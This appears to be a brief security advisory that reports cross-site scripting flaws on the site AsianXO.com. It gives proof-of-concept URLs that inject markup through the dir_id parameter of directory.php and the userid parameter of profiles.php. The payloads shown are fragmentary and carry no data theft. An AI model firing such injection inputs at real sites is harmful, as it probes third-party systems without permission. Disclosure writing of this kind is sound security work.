AsianXO.com
Homepage:
http://www.asianxo.com/
Effected files:
directory.php
profiles.php
Input boxes of editing profile
----------------------------
XSS Vulnerability via dir_id:
Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1"><"
Profiles.php PoC using malformed img tags in front a openended iframe:
http://www.axo2.com/profiles.php?userid=999999999<"">